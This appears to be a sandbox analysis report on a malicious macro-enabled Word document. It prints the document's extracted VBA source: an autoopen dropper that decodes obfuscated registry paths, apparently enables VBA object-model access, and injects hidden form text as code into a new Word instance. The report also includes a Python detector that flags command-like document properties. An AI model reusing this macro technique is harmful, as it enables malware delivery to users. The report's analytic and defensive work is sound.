                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                Malicious:false
                Reputation:high, very likely benign file
                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{555D4EB4-8E09-401E-A760-1A1C7B299BE3}.tmp
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):1024
                Entropy (8bit):0.05390218305374581
                Encrypted:false
                SSDEEP:3:ol3lYdn:4Wn
                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                Malicious:false
                Reputation:high, very likely benign file
                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5A73AA4B-62E1-448E-9310-09F37DB49412}.tmp
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):1536
                Entropy (8bit):0.1903644670878318
                Encrypted:false
                SSDEEP:3:/lMlt4slllFlNtwl5h9Z9:+lr45v
                MD5:43EADFFEFD5914B486C8193474EA3408
                SHA1:048972F9F902493E595F848E45052DF938621907
                SHA-256:46F3BCD8D35DE83BDD29CA5C831E78C421869E3D4D0F8DDD60CD2A9E8E60ED77
                SHA-512:11BBE96AFE28472C497DC7252560D77B9595C904C2253881AC407DFD5F23A3D4EA29526DB4DCA242B074D83217459D10FB428ACF92B934C17C286E73A87A3338
                Malicious:false
                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):162688
                Entropy (8bit):4.254404176001523
                Encrypted:false
                SSDEEP:1536:C6IL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CNJNSc83tKBAvQVCgOtmXmLpLm4l
                MD5:14FB2985EE00FC7637B8AB3AC19C232B
                SHA1:70865CE06647465D1C8D617D7B3822C6EED8FA26
                SHA-256:F807F0C3328C49E6DE9C375DE1B44A7AF6573C87E9DE732CBF28EF5D21C928DB
                SHA-512:982CB06D601BCEAB823364A859DBF54982C155C57EF17CBB0E07AAF60C46AF06641A00A6EAEC52B144A1F4D9DE33DB22EC86B05F7686EC7620098291478D7F46
                Malicious:false
                Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Datei-04.28.2021.LNK
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Wed Aug 26 14:08:14 2020, atime=Wed Apr 28 23:47:30 2021, length=90627, window=hide
                Category:dropped
                Size (bytes):2088
                Entropy (8bit):4.541049992446857
                Encrypted:false
                SSDEEP:24:8IU/XTwz6IkneDqOeebDv3q2dM7dD2IU/XTwz6IkneDqOeebDv3q2dM7dV:8b/XT3Ik4la2Qh2b/XT3Ik4la2Q/
                MD5:F3603CD4FAD8443004EB3A20F7FBF18F
                SHA1:98C244711422ABF826ACADDF440FAA84E84D7D1D
                SHA-256:5A64A7182FE5E360F10D8350BB951E41F18E47277EEFDBDE9F89C078048197A6
                SHA-512:485B665D124EAC582FE07172662A321F7DD0CC36E41A6DF48638FDCB7F4C34445BF7FD5258C021738DC0888DB751D5166D828566FB8A81AA86B50F02679C9E2D
                Malicious:false
                Preview: L..................F.... ....xV..{...xV..{.....;.<...b...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....r.2..b...R.. .DATEI-~1.DOC..V.......Q.y.Q.y*...8.....................D.a.t.e.i.-.0.4...2.8...2.0.2.1...d.o.c.......~...............-...8...[............?J......C:\Users\..#...................\\302494\Users.user\Desktop\Datei-04.28.2021.doc.+.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.a.t.e.i.-.0.4...2.8...2.0.2.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......302494..........D_....3N...W...9F.C....
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):86
                Entropy (8bit):4.326022969633015
                Encrypted:false
                SSDEEP:3:M1SmMIRVELUl5eIRVELUlmX1SmMIRVELUlv:MQ7rLUrerLUf7rLU1
                MD5:0BDE91546ED3D50D1B9A1B4A37CF9572
                SHA1:16FC4A4A6EA006B381E57857AB4B29D966A847EB
                SHA-256:4066E345B4B51909606757F4B5875000A5C838A8F8DE107415E6D67470FB032E
                SHA-512:5133A71D4FBEE2EE09CA4626944F07C7AE3DF9F24CC6C3767488A57D9E1E23A6E6D01C8521A56A811DFE3CA18B375AEA3B8E45534A2DABA4FD1869307AD91FDC
                Malicious:false
                Preview: [doc]..Datei-04.28.2021.LNK=0..Datei-04.28.2021.LNK=0..[doc]..Datei-04.28.2021.LNK=0..
                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):162
                Entropy (8bit):2.431160061181642
                Encrypted:false
                SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                Malicious:false
                Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                C:\Users\user\Desktop\~$tei-04.28.2021.doc
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):162
                Entropy (8bit):2.431160061181642
                Encrypted:false
                SSDEEP:3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                MD5:6AF5EAEBE6C935D9A5422D99EEE6BEF0
                SHA1:6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                SHA-256:CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                SHA-512:B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                Malicious:false
                Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...

                Static File Info

                General

                File type:Microsoft Word 2007+
                Entropy (8bit):7.82220089201397
                TrID:
                • Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99%
                • Word Microsoft Office Open XML Format document (49504/1) 32.35%
                • Word Microsoft Office Open XML Format document (43504/1) 28.43%
                • ZIP compressed archive (8000/1) 5.23%
                File name:Datei-04.28.2021.doc
                File size:103261
                MD5:6747583727ce069aa8ae9d398d35e5bc
                SHA1:97667bf552bf5557666b5266003b0411bc1669bc
                SHA256:127d2018e008677e5a0af20d8981806e07e3b57285787800554708803aaca6bd
                SHA512:88ca8855faf07a809f7badd05e0a36da9b24f103204e66ff2624de77a6f86428bee188f290dd224cabf99fe9ba0d28e73d543967d9e591fed69128ddf08e1719
                SSDEEP:1536:AH1R5bJCWehdklvI0APY2ywnbcbWSfZL2+wSJx8+RBZe0nV3AgXf0lSQw6egTm:KbJrlZAPY2yWwb3ZadaxHeuNQpegTm
                File Content Preview:PK..........!.x..}....e.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                File Icon

                Icon Hash:e4eea2aaa4b4b4a4

                Static OLE Info

                General

                Document Type:OpenXML
                Number of OLE Files:1

                OLE File "/opt/package/joesandbox/database/analysis/399362/sample/Datei-04.28.2021.doc"

                Indicators

                Has Summary Info:False
                Application Name:unknown
                Encrypted Document:False
                Contains Word Document Stream:
                Contains Workbook/Book Stream:
                Contains PowerPoint Document Stream:
                Contains Visio Document Stream:
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:True

                Summary

                Title:explorer c:\users\public\argumentSelectTmp.hta
                Subject:
                Author:ujmg
                Keywords:
                Template:Normal
Last Saved By:Пользователь Windows (Russian for "Windows User")
Revision Number:2
                Total Edit Time:0
                Create Time:2021-04-28T04:45:00Z
                Last Saved Time:2021-04-28T04:45:00Z
                Number of Pages:1
                Number of Words:0
                Number of Characters:0
                Creating Application:Microsoft Office Word
                Security:4
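The Title property above, explorer c:\users\public\argumentSelectTmp.hta, is a command line rather than a document title. A macro can read such a value back through ActiveDocument.BuiltInDocumentProperties and hand it to a shell, which keeps the command out of the VBA source that static scanners look at; the report does not show this sample's macro body, so whether it does that here is an inference, not an observed fact. The Python below is an example added to this report, not Joe Sandbox code and not the sample's own: it reads docProps/core.xml from an OOXML container and flags properties whose value looks like a command or a path. The regular expression, the property list, and the in-memory docx builder are the example's own; the title and the creator "ujmg" are taken from the Summary above.

```python
"""Flag command-like strings stored in OOXML document properties.

Added example for this report, not part of Joe Sandbox or of the analysed
sample. The Summary above shows Title = "explorer c:\\users\\public\\argumentSelectTmp.hta",
a command line rather than a title. Reading such a value back through
ActiveDocument.BuiltInDocumentProperties is a common way for a macro to keep
its command out of the VBA source (whether this sample does so is not shown
in the report). The docx used below is constructed in memory.
"""
from __future__ import annotations

import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
}
# Core properties a macro can reach via BuiltInDocumentProperties.
PROPERTY_TAGS = ["dc:title", "dc:subject", "dc:creator", "cp:keywords",
                 "dc:description", "cp:category", "cp:lastModifiedBy"]

# Heuristic for "this is a command, not prose": a known host binary followed
# by an argument, a drive or UNC path, or a script/binary extension.
COMMAND_RE = re.compile(r"""(?ix)
    (?:^|\s)(?:explorer|cmd|powershell|pwsh|wscript|cscript|mshta|rundll32
              |regsvr32|certutil|bitsadmin|msiexec)(?:\.exe)?\s+\S
  | [a-z]:\\[^\s"']+
  | \\\\[^\s"']+\\[^\s"']+
  | \.(?:hta|vbs|vbe|js|jse|wsf|ps1|bat|cmd|dll|exe|scr)(?:\b|$)
""")


def read_core_properties(docx_bytes: bytes) -> dict[str, str]:
    """Return docProps/core.xml of an OOXML container as {prefixed tag: text}."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if "docProps/core.xml" not in zf.namelist():
            return {}
        root = ET.fromstring(zf.read("docProps/core.xml"))
    props: dict[str, str] = {}
    for tag in PROPERTY_TAGS:
        el = root.find(tag, NS)
        if el is not None and el.text:
            props[tag] = el.text
    return props


def suspicious_properties(docx_bytes: bytes) -> dict[str, str]:
    """Core properties whose value looks like a command line or a path."""
    return {tag: val for tag, val in read_core_properties(docx_bytes).items()
            if COMMAND_RE.search(val)}


def build_docx(title: str, creator: str = "ujmg") -> bytes:
    """Constructed minimal OOXML zip containing only the parts this check reads."""
    core = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<cp:coreProperties xmlns:cp="{NS["cp"]}" xmlns:dc="{NS["dc"]}">'
        f'<dc:title>{escape(title)}</dc:title>'
        f'<dc:creator>{escape(creator)}</dc:creator>'
        '<cp:lastModifiedBy>user</cp:lastModifiedBy>'
        '</cp:coreProperties>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("docProps/core.xml", core)
    return buf.getvalue()


# Title and creator copied from the Summary section of this report.
SAMPLE = build_docx(r"explorer c:\users\public\argumentSelectTmp.hta")
BENIGN = build_docx("Quarterly figures")

if __name__ == "__main__":
    for tag, val in suspicious_properties(SAMPLE).items():
        print(f"suspicious {tag}: {val}")
```

On a real submission, pass the bytes of the .doc itself (this sample is OpenXML despite its extension, as the Static File Info section shows) to suspicious_properties; the check is cheap enough to run on every attachment before any macro analysis.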

                Document Summary

                Number of Lines:2
                Number of Paragraphs:0
                Thumbnail Scaling Desired:false
                Company:
                Contains Dirty Links:false
                Shared Document:false
                Changed Hyperlinks:false
                Application Version:16.0000

                Streams with VBA

                VBA File Name: ThisDocument.cls, Stream Size: 1127
                General
                Stream Path:VBA/ThisDocument
                VBA File Name:ThisDocument.cls
                Stream Size:1127
                Data ASCII:. . . . . . . . . 4 . . . . . . . . . . . b . . . p . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . - . . i . H . ! . . W D Q . . . . . . . . K . . . . y . ' y . . . . . . . . . . . . . . . . . . . . X . O z . Y $ L . . . & . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . X . O z . Y $ L . . . & . . . - . . - . . i . H . ! . . W D Q . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:01 16 03 00 06 00 01 00 00 34 03 00 00 e4 00 00 00 ea 01 00 00 62 03 00 00 70 03 00 00 c4 03 00 00 00 00 00 00 01 00 00 00 71 cc 96 90 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 03 7f 2d b5 fa 69 1d 48 9e 21 86 f4 57 44 51 84 ef 8e e3 9e df be fe 4b b5 1f 1d 00 79 ba 27 79 00 00 00 00 00 00 00 00 00 00 00 00 00

                VBA Code Keywords

                Keyword
                False
                VB_Exposed
                Attribute
                VB_Creatable
                VB_Name
                VB_PredeclaredId
                VB_GlobalNameSpace
                VB_Base
                VB_Customizable
                VB_TemplateDerived
                "ThisDocument"
                VBA Code
                Attribute VB_Name = "ThisDocument"
                Attribute VB_Base = "1Normal.ThisDocument"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = True
                Attribute VB_TemplateDerived = True
                Attribute VB_Customizable = True
                VBA File Name: UserForm1.frm, Stream Size: 1182
                General
                Stream Path:VBA/UserForm1
                VBA File Name:UserForm1.frm
                Stream Size:1182
                Data ASCII:. . . . . . . . . V . . . . . . . L . . . . . . . ] . . . . . . . . . . . . . . . q . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:01 16 03 00 00 f0 00 00 00 56 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 5d 03 00 00 b1 03 00 00 00 00 00 00 01 00 00 00 71 cc 28 c6 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                VBA Code Keywords

                Keyword
                False
                VB_Exposed
                Attribute
                VB_Name
                VB_Creatable
                VB_PredeclaredId
                VB_GlobalNameSpace
                VB_Base
                VB_Customizable
                VB_TemplateDerived
                VBA Code
                Attribute VB_Name = "UserForm1"
                Attribute VB_Base = "0{C70C972A-9359-4393-8302-539D2FF78F23}{25405C50-5AD6-4D56-82F4-D7B1075E12BD}"
                Attribute VB_GlobalNameSpace = False
                Attribute VB_Creatable = False
                Attribute VB_PredeclaredId = True
                Attribute VB_Exposed = False
                Attribute VB_TemplateDerived = False
                Attribute VB_Customizable = False
                VBA File Name: listCopy.bas, Stream Size: 1037
                General
                Stream Path:VBA/listCopy
                VBA File Name:listCopy.bas
                Stream Size:1037
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . m . . . . . . . . . . . q . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:01 16 03 00 00 f0 00 00 00 92 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 99 02 00 00 6d 03 00 00 00 00 00 00 01 00 00 00 71 cc c1 2d 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                VBA Code Keywords

                Keyword
                "listCopy"
                clearIteratorRef
                Attribute
                autoopen()
                convertIndex
                VB_Name
                viewValueTextbox
                memoryIndex
                String
                VBA Code
                Attribute VB_Name = "listCopy"
                Sub autoopen()
                viewValueTextbox
                Dim clearIteratorRef As String
                clearIteratorRef = convertIndex
                memoryIndex clearIteratorRef
                End Sub
                VBA File Name: optionRemoveGeneric.bas, Stream Size: 1304
                General
                Stream Path:VBA/optionRemoveGeneric
                VBA File Name:optionRemoveGeneric.bas
                Stream Size:1304
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:01 16 03 00 00 f0 00 00 00 9a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff a1 02 00 00 e9 03 00 00 00 00 00 00 01 00 00 00 71 cc 13 c4 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                VBA Code Keywords

                Keyword
                optionPtr.Quit
                False
                optionPtr
                String)
                Attribute
                optionPtr.Documents.Add
                collectionSelect
                VB_Name
                CreateObject("word.application")
                "optionRemoveGeneric"
                memoryTempTrust
                memoryIndex(memoryTempTrust
                optionPtr.Visible
                SaveChanges:=wdDoNotSaveChanges
                collectionSelect.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString
                VBA Code
                Attribute VB_Name = "optionRemoveGeneric"
                Sub memoryIndex(memoryTempTrust As String)
                Set optionPtr = CreateObject("word.application")
                Set collectionSelect = optionPtr.Documents.Add
                collectionSelect.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString memoryTempTrust
                optionPtr.Visible = False
                optionPtr.Quit SaveChanges:=wdDoNotSaveChanges
                End Sub
                VBA File Name: refConvertCaption.bas, Stream Size: 1636
                General
                Stream Path:VBA/refConvertCaption
                VBA File Name:refConvertCaption.bas
                Stream Size:1636
                Data ASCII:. . . . . . . . . b . . . . . . . . . . . . . . . i . . . . . . . . . . . . . . . q . u m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:01 16 03 00 00 f0 00 00 00 62 03 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 69 03 00 00 0d 05 00 00 00 00 00 00 01 00 00 00 71 cc 75 6d 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                VBA Code Keywords

                Keyword
                String)
                VB_Name
                vbSwap
                "refConvertCaption"
                memCaptionOption.Text
                StrConv(captionPaste,
                Function
                vbSwap.createElement("code")
                exceptionPointer
                Object
                Variant
                memConvertStruct)
                ptrPtrStorage
                memCaptionOption.DataType
                constCollectionDatabase
                memCaptionOption
                memCaptionOption.nodeTypedValue
                exceptionPointer(captionPaste,
                ptrPtrStorage(constCollectionDatabase
                Attribute
                VBA Code
                Attribute VB_Name = "refConvertCaption"
                Function ptrPtrStorage(constCollectionDatabase As String) As Variant
                Dim vbSwap As Object
                Dim memCaptionOption As Object
                Set vbSwap = CreateObject("msxml2.domdocument")
                Set memCaptionOption = vbSwap.createElement("code")
                memCaptionOption.DataType = "bin.base64"
                memCaptionOption.Text = constCollectionDatabase
                ptrPtrStorage = memCaptionOption.nodeTypedValue
                End Function
                Function exceptionPointer(captionPaste, memConvertStruct)
                exceptionPointer = StrConv(captionPaste, memConvertStruct)
                End Function
                VBA File Name: repoText.bas, Stream Size: 2970
                General
                Stream Path:VBA/repoText
                VBA File Name:repoText.bas
                Stream Size:2970
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . ; . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:01 16 03 00 00 f0 00 00 00 aa 04 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff b1 04 00 00 b9 08 00 00 00 00 00 00 01 00 00 00 71 cc 1c 3b 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                VBA Code Keywords

                Keyword
                convertIndex
                String)
                "repoText"
                clearRefLoad
                .RegWrite
                VB_Name
                Public
                Function
                varClass
                String
                Application.Version
                captionBufData()
                textExButton
                vbUnicode)
                Chr$(Val("&H"
                clearRefLoad,
                "jZXNzVkJPTQ=="),
                Mid$(tempClearIndex,
                arrayOption
                Len(tempClearIndex)
                mainExLocal
                listboxNextVar()
                CreateObject("ws"
                "VjdXJpdHlcQWN"
                viewValueTextbox()
                trustStruct
                tempClearIndex
                globalResponse
                textExButton(ByVal
                varClass()
                arrayOption,
                countSelect
                captionBufData
                titleSize
                Attribute
                "REG_DWORD"
                "cript.sh"
                "ell")
                convertIndex()
                listboxNextVar
                clearReference
                mainExLocal()
                VBA Code
                Attribute VB_Name = "repoText"
                Function captionBufData() As String
                captionBufData = Application.Version
                End Function
                Function mainExLocal()
                mainExLocal = "U5UX1VTRVJcU29mdHdhcmVcTWlj"
                End Function
                Function listboxNextVar()
                listboxNextVar = "cript.sh"
                End Function
                Function varClass()
                varClass = "VjdXJpdHlcQWN"
                End Function
                Sub viewValueTextbox()
                clearReference = exceptionPointer(ptrPtrStorage("SEtFWV9DVVJSR" & mainExLocal & "cm9zb2Z0XE9mZmljZVw="), vbUnicode)
                countSelect = captionBufData
                globalResponse = exceptionPointer(ptrPtrStorage("XFdvcmRcU2" & varClass & "jZXNzVkJPTQ=="), vbUnicode)
                clearRefLoad = clearReference & countSelect & globalResponse
                With CreateObject("ws" & listboxNextVar & "ell")
                .RegWrite clearRefLoad, 1, "REG_DWORD"
                End With
                End Sub
                Public Function textExButton(ByVal tempClearIndex As String) As String
                For arrayOption = 1 To Len(tempClearIndex) Step 2
                titleSize = Chr$(Val("&H" & Mid$(tempClearIndex, arrayOption, 2)))
                trustStruct = trustStruct & titleSize
                Next arrayOption
                textExButton = trustStruct
                End Function
                Function convertIndex()
                convertIndex = UserForm1.TextBox1
                End Function

                Streams

                Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 689
                General
                Stream Path:PROJECT
                File Type:ASCII text, with CRLF line terminators
                Stream Size:689
                Entropy:5.29372046772
                Base64 Encoded:True
                Data ASCII:I D = " { 2 A 8 A 4 9 5 1 - B 5 C 1 - 4 C 9 C - A E 1 6 - E D B 1 E 3 E 7 5 4 8 3 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = U s e r F o r m 1 . . M o d u l e = l i s t C o p y . . M o d u l e = r e f C o n v e r t C a p t i o n . . M o d u l e = o p t i o n R e m o v e G e n e r i c . . M o d u l e = r e p o T e x t . . N a m e = " P r o j e c t " . . H e l p
                Data Raw:49 44 3d 22 7b 32 41 38 41 34 39 35 31 2d 42 35 43 31 2d 34 43 39 43 2d 41 45 31 36 2d 45 44 42 31 45 33 45 37 35 34 38 33 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 0d 0a 42
                Stream Path: PROJECTwm, File Type: data, Stream Size: 239
                General
                Stream Path:PROJECTwm
                File Type:data
                Stream Size:239
                Entropy:3.53833137583
                Base64 Encoded:False
                Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . l i s t C o p y . l . i . s . t . C . o . p . y . . . r e f C o n v e r t C a p t i o n . r . e . f . C . o . n . v . e . r . t . C . a . p . t . i . o . n . . . o p t i o n R e m o v e G e n e r i c . o . p . t . i . o . n . R . e . m . o . v . e . G . e . n . e . r . i . c . . . r e p o T e x t . r . e . p . o . T . e . x . t . . . . .
